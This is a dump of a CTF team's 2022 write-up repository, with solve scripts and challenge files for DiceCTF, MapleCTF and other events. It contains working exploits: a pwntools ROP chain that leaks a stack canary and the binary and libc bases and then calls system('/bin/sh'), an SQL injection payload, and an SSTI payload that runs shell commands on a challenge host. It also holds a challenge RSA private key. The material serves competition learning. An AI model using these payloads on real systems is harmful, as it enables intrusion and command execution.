https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222211953.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212013.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212013.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212045.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212045.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212131.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212131.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212154.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212154.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212232.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212232.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212243.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212243.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222212315.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222212315.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222214414.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222214414.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222214636.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222214636.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Final/Pasted image 20221222215806.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Final/Pasted image 20221222215806.png -------------------------------------------------------------------------------- /2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/CJCTF 2022 Quals/TCP1P_CJ2022.pdf -------------------------------------------------------------------------------- /2022/Compfest14-quals/COMPFEST14_TCP1P.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Compfest14-quals/COMPFEST14_TCP1P.pdf -------------------------------------------------------------------------------- /2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/Cyberwariors-Hackathon-Quals/CyberHackathon_Proof_of_Concept_Babak_Penyisihan_Santri_Anime (1).pdf -------------------------------------------------------------------------------- /2022/Cyberwariors-Hackathon-Quals/READMME.md: -------------------------------------------------------------------------------- 1 | .pdf) -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/kfb/flag.txt: -------------------------------------------------------------------------------- 1 | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_ -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/kfb/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python -u 2 | 3 | from Crypto.Cipher import AES 4 | from Crypto.Random import get_random_bytes 5 | from Crypto.Util.Padding import pad 6 | from Crypto.Util.strxor import strxor 7 | from more_itertools import ichunked 8 | 9 | BLOCK = AES.block_size 10 | FLAG = open('flag.txt', 'rb').read().strip() 11 | 12 | def encrypt_block(k, pt): 13 | cipher = AES.new(k, AES.MODE_ECB) 14 | return cipher.encrypt(pt) 15 | 16 | def encrypt(k, pt): 17 | assert len(k) == BLOCK 18 | pt = pad(pt, BLOCK) 19 | ct = b'' 20 | for bk in ichunked(pt, BLOCK): 21 | ct += strxor(encrypt_block(k, k), bytes(bk)) 22 | return ct 23 | 24 | def main(): 25 | k = get_random_bytes(BLOCK) 26 | enc = encrypt(k, FLAG) 27 | print(f'> {enc.hex()}') 28 | 29 | pt = bytes.fromhex(input('< '))[:BLOCK] 30 | enc = encrypt(k, pt) 31 | print(f'> {enc.hex()}') 32 | 33 | if __name__ == '__main__': 34 | main() 35 | -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/kfb/solve.py: -------------------------------------------------------------------------------- 1 | 2 | input_plain = 'A' * 16 3 | input_enc = "76bc16a9f5b95995e83aa5d4472d4e41" 4 | 5 | flag_enc = "0ec376dc9ec22fe7a759ddab22513a0e15d86fda8ef63deaa759c1b1315b013903f36dd78ade3ada9a1986f16f593c6603943e8a80cd7cb1852db2c3503a5956" 6 | 7 | def brute_key(plain, enc): 8 | '''brute force the key. enc is hex, plain is ascii''' 9 | enc = bytes.fromhex(enc) 10 | key = "" 11 | for i, v in enumerate(enc): 12 | for j in range(256): 13 | if chr(v ^ j) == plain[i]: 14 | key += j.to_bytes(1, "big").hex() 15 | break 16 | return key 17 | 18 | def xor_enc(enc, key): 19 | '''xor the enc with the key. enc is hex, key is hex''' 20 | key = bytes.fromhex(key) 21 | enc = bytes.fromhex(enc) 22 | flag = "" 23 | for i, v in enumerate(enc): 24 | s = v ^ key[i % len(key)] 25 | flag += chr(s) 26 | return flag.encode("ascii").hex() 27 | 28 | def get_patern(): 29 | '''make dictionary of patern, and return dictionary of key and value, 30 | where the key is the hex patern and the value is the ascii patern''' 31 | patern_hex = "3033323534373639383b3a3d3c3f3e212023222524272629282b1013121514171619181b1a1d1c1f1e010003020504070609080b606362656467666968612a2c0e" 32 | patern_hex = [patern_hex[i:i+2] for i in range(0, len(patern_hex), 2)] 33 | alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890{}_" 34 | lst = dict() 35 | for i, v in enumerate(alphabet): 36 | lst[patern_hex[i]] = v 37 | return lst 38 | 39 | def translate_patern(enc): 40 | '''translate the hex patern to ascii, where enc is hex''' 41 | enc = [enc[i:i+2] for i in range(0, len(enc), 2)] 42 | patern = get_patern() 43 | text = "" 44 | try: 45 | for i in enc: 46 | text += patern[i] 47 | except: 48 | return text 49 | return text 50 | 51 | key = brute_key(input_plain, input_enc) 52 | ugly_flag = xor_enc(flag_enc, key) 53 | 54 | flag = (translate_patern(ugly_flag)) 55 | 56 | print(flag) -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/obp/obp.output.txt: -------------------------------------------------------------------------------- 1 | babda2b7a9bcbda68db38dbebda68dbdb48db9b7aba18dbfb6a2aaa7a3beb1a2bfb7b5a3a7afd8 2 | -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/obp/solve.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | with open('obp.output.txt', 'r') as f: 4 | plaintext = bytearray.fromhex(f.read()) 5 | 6 | # print(plaintext) 7 | 8 | for i in range(256): 9 | random.seed(i) 10 | key = random.randrange(256) 11 | ciphertext = [key ^ byte for byte in plaintext] 12 | 13 | print(bytes(ciphertext)) 14 | 15 | # hope{not_a_lot_of_keys_mdpxuqlcpmegqu} -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/pem/encrypted.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/encrypted.bin -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/pem/flag.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/crypto/pem/flag.txt -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/pem/generate.py: -------------------------------------------------------------------------------- 1 | from Crypto.PublicKey import RSA 2 | from Crypto.Cipher import PKCS1_OAEP 3 | 4 | with open('flag.txt','rb') as f: 5 | flag = f.read() 6 | 7 | key = RSA.generate(2048) 8 | cipher_rsa = PKCS1_OAEP.new(key) 9 | enc = cipher_rsa.encrypt(flag) 10 | 11 | with open('privatekey.pem','wb') as f: 12 | f.write(key.export_key('PEM')) 13 | 14 | with open("encrypted.bin", "wb") as f: 15 | f.write(enc) 16 | -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/pem/privatekey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEogIBAAKCAQEAxAYlKx//McvCLMmkxnIyJCHSTC2oGlm2N6SGol6s8mKQp3+g 3 | NoZHZnimFASKqyHoBJbfsB9Tzl50tOy3hyBKrjzKZFFrSXShFDRDP9Q11CeUpAbx 4 | L5hCzOo8IYSMHfifstJilxIc2kJkLz7zPC+IjbpQE1ec0TOnSnIqyaKLUKbimOkw 5 | MTcxqFppadUjqw1Fg3wqxxl/mTYt296DpMmGRZ45G3JXb2CTkArWi9PKNvvWHH+d 6 | kxUgG681gwAOSRYH4QiCKMYHH2RdYtRPI0eyGXlLxEfNbncGrFjcnBf7eDMULAuM 7 | GWSPhFVJtXaRGhDydZC8cMU815TgeLIJwpib7wIDAQABAoIBABSSJoVjirbRkLN9 8 | h7axljR3fiezZOA7COXG9MAGWnTnRhHl0UzXg5er0pXoMhsqaDxPDvNfHj7aZ7ny 9 | 24GpMF0fkQe9CZrATAUgROxmWy3D55PdDKN3gY8ah6vmyoN8q1mrPWBoLLH05KmW 10 | nBT1Ugm5gxy8hX7owkYMPBRD5AXXBnKJndpnoIIYAQDMNOlxcQdQT4C2Zpw6ti+y 11 | EsLLEwIMJCGSOerfldEtsUnjE6RhfN73iOXBPKTr1yNXooGwgaCFFwyMB5HzDUnG 12 | m9/q0dKNBSkWaEAqqtwww3krHP/1RJtF0OlUwTJIo02fqny84R2wGZy5tVYX83hH 13 | Z98SFdkCgYEA0Zcr+s0r3zq7gtWNScj1XpeHg6BRvGE93pdTUqRvG85NIz9zpXpp 14 | WZXCuvuU6XxZT7739cqqDh7YKAh31nyeSDdzKKpGjZV4/ux88Muzds33eDjQBRBI 15 | EtHiuse6zYuQnxykjCQfPuG2v/DPFbMKQ18Oa+OuGRn7PK1DP4V0y1kCgYEA723x 16 | h4DpSPJgHuxhGVevjIQ9gT06sdSqhF6b0CJJtdG08pUz0AK4Lrn/W1xE2dzuTRmG 17 | /Y1XMnCo0ddDOyfBmwjBC+9t2GunF+5xz0s2vNEMxXOy17z5cZjtElQqU6WkBKoQ 18 | 6kn3ElKiM4zlRI7lj6HTd8WZ8DaGw/cZi0vAYIcCgYA14kizTSZXWNE2fNK7Qoga 19 | zphPddsttE5kuMD6QT4zhuF8C2cfBw6osoEC84VAVfDcOLulHHqF8NYfzLWKljVX 20 | WbIopUZIRkJ6P7CLc8Nq6t8RsIGCm8H73KwO2ySijZwb3BBN20eRMhR62l1TNdmQ 21 | opKhmEJ9P5nA6sacQSJa2QKBgDMT1Evg/2N1eXX/XXOHlka2y1wv0L6xLLNSb5EG 22 | T40/MIfztnrwqZQmT8iQtYt4q0m9YWPj7C8xg4JIluoewBmv02cVa+yYgqwDTTo4 23 | xHOhcUUKOqP1h41pX2HinKj9lDD+it9Aajn5cOroatymU2jB0BgkCoQJTdSueT+T 24 | KHYvAoGAJPG2L0XNDtXW0MzZv16tiu5K5E3gEcvBYOcrnyq0Hc4EQVy2OF4825N5 25 | 6kOTaX5VjrIkBfBXxOdOiFJLCbHaQhtHtR2UY1u2H6EEOommNS6UaDrurZ03EqEW 26 | Vfd+xSRR6zSHN6NQwXT/9vIKbFzr7aqGElrAOWLoLUQ2NsKp3eI= 27 | -----END RSA PRIVATE KEY----- -------------------------------------------------------------------------------- /2022/DiceCTF/crypto/pem/solve.py: -------------------------------------------------------------------------------- 1 | from Crypto.PublicKey import RSA 2 | from Crypto.Cipher import PKCS1_OAEP 3 | 4 | private_key = RSA.import_key(open('privatekey.pem').read()) 5 | cipher_rsa = PKCS1_OAEP.new(private_key) 6 | with open('encrypted.bin', 'rb') as f: 7 | enc = f.read() 8 | flag = cipher_rsa.decrypt(enc) 9 | print(flag) -------------------------------------------------------------------------------- /2022/DiceCTF/rev/check/.gdb_history: -------------------------------------------------------------------------------- 1 | disass main 2 | exit 3 | disass main 4 | disass -function 5 | disass *-fflush 6 | disass *strcmp 7 | disass 0x1886 8 | disass *0x1886 9 | exit 10 | b *0x192d 11 | run 12 | n 13 | n 14 | run 15 | clear 16 | clear *0x192d 17 | b *0x192a 18 | run 19 | n 20 | run 21 | c *0x192a 22 | clear *0x192a 23 | run 24 | disass strcpm 25 | disass *strcmp 26 | b *strcmp 27 | run 28 | n 29 | exit 30 | python 31 | import gdb 32 | 33 | gdb.execute("b *strcmp") 34 | for i in range(10): 35 | gdb.execute("n") 36 | end 37 | python 38 | import gdb 39 | 40 | gdb.execute("b *strcmp") 41 | gdb.execute("run") 42 | for i in range(10): 43 | gdb.execute("n") 44 | end 45 | n 46 | c 47 | python 48 | import gdb 49 | 50 | gdb.execute("b *strcmp") 51 | gdb.execute("run") 52 | for i in range(40): 53 | gdb.execute("n") 54 | end 55 | exit 56 | -------------------------------------------------------------------------------- /2022/DiceCTF/rev/check/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/DiceCTF/rev/check/challenge -------------------------------------------------------------------------------- /2022/DiceCTF/rev/check/solve.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | 3 | gdb.execute("b *strcmp") 4 | gdb.execute("run") 5 | for i in range(40): 6 | gdb.execute("n") -------------------------------------------------------------------------------- /2022/DiceCTF/rev/slices/solve.py: -------------------------------------------------------------------------------- 1 | 2 | flag = ["a" for i in range(32)] 3 | 4 | flag[:5] = 'hope{' 5 | flag[-1] = '}' 6 | flag[5::3] = 'i0_tnl3a0' 7 | flag[4::4] = '{0p0lsl' 8 | flag[3::5] = 'e0y_3l' 9 | flag[6::3] = '_vph_is_t' 10 | flag[7::3] = 'ley0sc_l}' 11 | 12 | print('flag is: ', "".join(flag)) 13 | -------------------------------------------------------------------------------- /2022/DiceCTF/web/inspect-me/README.md: -------------------------------------------------------------------------------- 1 | Untuk challenge kali ini, saya hanya perlu mendownload ekstensi absolute clicker di chrome. Kemudian mendownload source code challenge ini. -------------------------------------------------------------------------------- /2022/DiceCTF/web/inspect-me/inspect-me.mc.ax.html: -------------------------------------------------------------------------------- 1 | 2 | 34 | 46 | 47 |
Output: %s
34 |= QQ[]\n", 57 | "\n", 58 | "pq = ideal([p * q - N, p ^ 4 - q ^ 3 - hint]).variety()\n", 59 | "print(pq)" 60 | ] 61 | }, 62 | { 63 | "cell_type": "markdown", 64 | "metadata": {}, 65 | "source": [ 66 | "Kembali ke python:" 67 | ] 68 | }, 69 | { 70 | "cell_type": "code", 71 | "execution_count": 1, 72 | "metadata": {}, 73 | "outputs": [ 74 | { 75 | "name": "stdout", 76 | "output_type": "stream", 77 | "text": [ 78 | "b'maple{s0lving_th3m_p3rf3ct_r000ts_1s_fun}'\n" 79 | ] 80 | } 81 | ], 82 | "source": [ 83 | "from Crypto.Util.number import long_to_bytes, inverse\n", 84 | "\n", 85 | "p = 11248052945492193606877386307812298309646455365482356576580845624056836046347518805927852646289457003475918197991787867864250859819603651806169306473552239\n", 86 | "q = 11917573148183173444338385104784582231114229409447057112131253050235068806316496452352116287542988361044359262597423159386263430710183647113674868056755407\n", 87 | "\n", 88 | "phi = (p-1)*(q-1)\n", 89 | "\n", 90 | "n = 134049493752540418773065530143076126635445393203564220282068096099004424462500237164471467694656029850418188898633676218589793310992660499303428013844428562884017060683631593831476483842609871002334562252352992475614866865974358629573630911411844296034168928705543095499675521713617474013653359243644060206273\n", 91 | "e = 65537\n", 92 | "c = 110102068225857249266317472106969433365215711224747391469423595211113736904624336819727052620230568210114877696850912188601083627767033947343144894754967713943008865252845680364312307500261885582194931443807130970738278351511194280306132200450370953028936210150584164591049215506801271155664701637982648648103\n", 93 | "\n", 94 | "# d = pow(e, -1, phi)\n", 95 | "# or\n", 96 | "d = inverse(e, phi)\n", 97 | "pt = pow(c, d, n)\n", 98 | "decrypted = long_to_bytes(pt)\n", 99 | "print(decrypted)" 100 | ] 101 | } 102 | ], 103 | "metadata": { 104 | "kernelspec": { 105 | "display_name": "Python 3.10.5 64-bit", 106 | "language": "python", 107 | "name": "python3" 108 | }, 109 | "language_info": { 110 | "codemirror_mode": { 111 | "name": "ipython", 112 | "version": 3 113 | }, 114 | "file_extension": ".py", 115 | "mimetype": "text/x-python", 116 | "name": "python", 117 | "nbconvert_exporter": "python", 118 | "pygments_lexer": "ipython3", 119 | "version": "3.10.5" 120 | }, 121 | "orig_nbformat": 4, 122 | "vscode": { 123 | "interpreter": { 124 | "hash": "e7370f93d1d0cde622a1f8e1c04877d8463912d04d973331ad4851f04de6915a" 125 | } 126 | } 127 | }, 128 | "nbformat": 4, 129 | "nbformat_minor": 2 130 | } 131 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/pwn/README.md: -------------------------------------------------------------------------------- 1 | # warmup1 2 |  3 | 4 | 5 | bof length 24 6 | 7 | 8 | karena ini bin PIE dan kebetulan return address asli dengan func win sebelahan tinggal write lower address 9 | 10 | # warmup2 11 | flow dari exploitnya: 12 | 13 | ```python 14 | # [Phase 1 - First Input] leak canary 15 | p.recvuntil(b'What\'s your name?\n') 16 | p.sendline(b'A' * 264) 17 | print(p.recv(271).decode()) 18 | 19 | tmp = b'\x00' 20 | tmp += p.recv(7) 21 | 22 | canary = int.from_bytes(tmp, byteorder='little') 23 | print('[+] Canary: ' + hex(canary)) 24 | 25 | # [Phase 1 - Second Input] jump ke func `main` lagi karena next phase kita akan leak base address dari bin. dan juga karena kita udah dapet canarynya, jadi gabakal dapet stack smashing detect:3 26 | p.recvuntil(b'How old are you?\n') 27 | 28 | payload = b'A' * 264 29 | payload += p64(canary) 30 | payload += b'A' * 8 31 | payload += p8(0x9E) # 0x9E ini low address dari func `main`, jadi kita melakukan recursive disini sampai kita dapet semua yg kita butuh. 32 | p.send(payload) 33 | 34 | # [Phase 2 - First Input] leak bin base addr 35 | p.recvuntil(b'What\'s your name?\n') 36 | p.sendline(b'A' * 248) 37 | print(p.recv(255)) 38 | 39 | tmp = b'\xf0' 40 | tmp += p.recv(5) 41 | 42 | base = int.from_bytes(tmp, byteorder='little') - 0x12F0 43 | 44 | print('[+] base: ' + hex(base)) 45 | 46 | # [Phase 2 - Second Input] jump ke func `main` lagi. 47 | p.recvuntil(b'How old are you?\n') 48 | 49 | payload = b'A' * 264 50 | payload += p64(canary) 51 | payload += b'A' * 8 52 | payload += p8(0x9E) 53 | p.send(payload) 54 | 55 | [Phase 3 - First Input] leak libc base addr 56 | p.recvuntil(b'What\'s your name?\n') 57 | p.sendline(b'A' * 184) 58 | print(p.recv(191)) 59 | 60 | tmp = b'\x80' 61 | tmp += p.recv(5) 62 | 63 | libc = int.from_bytes(tmp, byteorder='little') - 0x1ce980 64 | print('[+] libc: ' + hex(libc)) 65 | 66 | # [Phase 3 - Second Input] jump to system("/bin/sh") menggunakan gadget pop rdi 67 | pop_rdi = 0x1353 # bin 68 | system = 0x45880 # libc 69 | binsh = 0x194882 # libc 70 | 71 | payload = b'A' * 264 72 | payload += p64(canary) 73 | payload += b'A' * 8 74 | payload += p64(base + pop_rdi) 75 | payload += p64(libc + binsh) 76 | payload += p64(libc + system) 77 | p.send(payload) 78 | 79 | p.interactive() 80 | 81 | # and we got shell :3 82 | ``` 83 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/pwn/terminal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/pwn/terminal.png -------------------------------------------------------------------------------- /2022/MapleCTF 2022/pwn/warmup1/chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/pwn/warmup1/chal -------------------------------------------------------------------------------- /2022/MapleCTF 2022/pwn/warmup1/flag.txt: -------------------------------------------------------------------------------- 1 | test{flag} -------------------------------------------------------------------------------- /2022/MapleCTF 2022/pwn/warmup1/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | exe = ELF("./chal", checksec=False) 4 | context.log_level = "WARNING" 5 | context.binary = exe 6 | context.terminal = "konsole -e".split() 7 | 8 | def gdbdebug(exe: process): 9 | script = """ 10 | break *win 11 | finish 12 | """ 13 | gdb.attach(exe, gdbscript=script) 14 | 15 | p = process() 16 | gdbdebug(p) 17 | payload = b"" 18 | payload += b"aaaabaaacaaadaaaeaaafaaa" 19 | payload += b"\x19" 20 | p.send(payload) 21 | p.interactive() -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/Bookstore/Solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | URL = "http://localhost:3000" 4 | 5 | def send(payload): 6 | print(payload) 7 | r = requests.post(URL+"/download-ebook", data={ 8 | "option": "kindle", 9 | "email": payload, 10 | "bookID": 1 11 | }, proxies={ 12 | # "http":"http://localhost:8080" 13 | }) 14 | print(r.text) 15 | 16 | payload = "\"',(SELECT texts FROM books WHERE id = 1)); -- --@lol.com" 17 | send(payload) 18 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/Bookstore/bookstore.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/Bookstore/bookstore.zip -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/Pickle Factory/pickle-factory.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/Pickle Factory/pickle-factory.zip -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/Pickle Factory/solve.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | URL = "http://pickle-factory.ctf.maplebacon.org" 5 | 6 | 7 | def create_pickle(payload): 8 | r = requests.post(URL+"/create-pickle", data={ 9 | "foo": payload 10 | }) 11 | return r.text 12 | 13 | 14 | def view_pickle(uid): 15 | r = requests.get(URL+"/view-pickle", params={ 16 | "filler": "", 17 | "space": "", 18 | "uid": uid 19 | }) 20 | return r.text 21 | 22 | 23 | cmd = "cat flag.log" 24 | # vulnerability SSTI 25 | payload = '{"asd":"||{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(\'' + cmd + '\').read()}}||"}' 26 | n = view_pickle(create_pickle(payload)) 27 | print(n) 28 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/a.out -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/honksay.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/honksay.tar.gz -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._Dockerfile: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._Dockerfile -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._app.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._app.js -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._goose.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._goose.js -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._package-lock.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._package-lock.json -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._package.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._package.json -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/._public: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/MapleCTF 2022/web/honksay/hosted/._public -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:alpine 2 | 3 | # Create app directory 4 | WORKDIR /usr/src/honksay 5 | 6 | # env values 7 | ENV PORT=9988 8 | ENV FLAG="maple{fakefleg}" 9 | 10 | RUN apk add --no-cache \ 11 | chromium \ 12 | nss \ 13 | freetype \ 14 | harfbuzz \ 15 | ca-certificates \ 16 | ttf-freefont \ 17 | nodejs 18 | 19 | ENV PUPPETEER_SKIP_CHROMIUM_DOWNLOAD=true \ 20 | PUPPETEER_EXECUTABLE_PATH=/usr/bin/chromium-browser 21 | 22 | # Install rest of the packages 23 | COPY package*.json ./ 24 | RUN npm install 25 | 26 | # App src 27 | COPY . . 28 | 29 | # Expose port 30 | EXPOSE 9988 31 | 32 | # User 33 | RUN addgroup -S ctf && adduser -S ctf -G ctf 34 | USER ctf:ctf 35 | 36 | # Start 37 | CMD [ "node", "app.js"] 38 | -------------------------------------------------------------------------------- /2022/MapleCTF 2022/web/honksay/hosted/app.js: -------------------------------------------------------------------------------- 1 | const express = require("express"); 2 | const cookieParser = require('cookie-parser'); 3 | const goose = require("./goose"); 4 | const clean = require('xss'); 5 | 6 | const app = express(); 7 | app.use(cookieParser()); 8 | app.use(express.urlencoded({extended:false})); 9 | 10 | const PORT = process.env.PORT || 9988; 11 | 12 | const headers = (req, res, next) => { 13 | res.setHeader('X-Frame-Options', 'DENY'); 14 | res.setHeader('X-Content-Type-Options', 'nosniff'); 15 | return next(); 16 | } 17 | app.use(headers); 18 | app.use(express.static('public')) 19 | 20 | const template = (goosemsg, goosecount) => ` 21 | 22 |
23 | 42 | 43 | ${goosemsg === '' ? '': `list: 11 | '''find all x and y coordinates in the data''' 12 | x = re.findall(r'x=(\d+)', dat) 13 | y = re.findall(r'y=(\d+)', dat) 14 | return x, y 15 | 16 | def get_comands(dat) -> list: 17 | '''find all command in the data''' 18 | com = re.findall(r'(?<=event=).*(?= HT)', dat) 19 | return com 20 | 21 | x, y = getxy(data) 22 | comand = get_comands(data) 23 | turtle.setup(WIDTH*100, HEIGHT*100) 24 | turtle.goto(0, 0) 25 | 26 | turtle.speed(10) 27 | 28 | def pixel_method(pix, size): 29 | turtle.shape('circle') 30 | turtle.shapesize(size, size) 31 | mouse = "mouseup" 32 | for i in range(len(x)): 33 | if mouse == "mouseup": 34 | turtle.penup() 35 | elif mouse == "mousedown": 36 | x_pix = (int(x[i])//pix) 37 | y_pix = (int(y[i])//pix) 38 | turtle.goto((x_pix*pix)-300, (y_pix*pix)) 39 | turtle.stamp() 40 | if comand[i] == 'mousedown': 41 | mouse = "mousedown" 42 | elif comand[i] == 'mouseup': 43 | mouse = "mouseup" 44 | while True: 45 | pass 46 | 47 | def pen_method(): 48 | mouse = "mouseup" 49 | for i in range(len(x)): 50 | if mouse == "mouseup": 51 | turtle.penup() 52 | elif mouse == "mousedown": 53 | turtle.pendown() 54 | if comand[i] == 'mousedown': 55 | mouse = "mousedown" 56 | elif comand[i] == 'mouseup': 57 | mouse = "mouseup" 58 | 